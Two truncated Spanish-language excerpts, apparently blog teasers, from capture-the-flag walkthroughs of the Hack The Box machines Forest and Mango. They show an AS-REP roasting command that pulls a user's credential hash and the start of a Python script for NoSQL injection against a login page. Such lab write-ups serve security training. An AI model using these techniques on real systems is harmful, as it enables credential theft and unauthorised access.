Nmap a forest.htb de la manera convencional. Enumerar usuarios como indica aquí. https://www.tarlogic.com/blog/como-atacar-kerberos/ O con el módulo smb-enum de metasploit. Con el resultado de nombres de usuario se elaboró el archivo username.txt. Se encontró el usuario svc-alfresco y se pudo determinar el hash de la credencial con el comando python GetNPUsers.py htb.local/ -usersfile usernames.txt -format…
Mango = MongoDB Revisar los certificados SSL y encontrar el nombre del host adecuado: https://staging-order.mango.htb Revisar el link https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection Elaborar un script para explotar NoSQLi #!/usr/bin/env python import requests import string url = «http://staging-order.mango.htb/index.php» headers = {«Host»: «staging-order.mango.htb»} cookies = {«PHPSESSID»: «9k6j39np56td4vq3q4lg4eh95j»} possible_chars = list(string.ascii_letters) + list(string.digits) + [«\\»+c…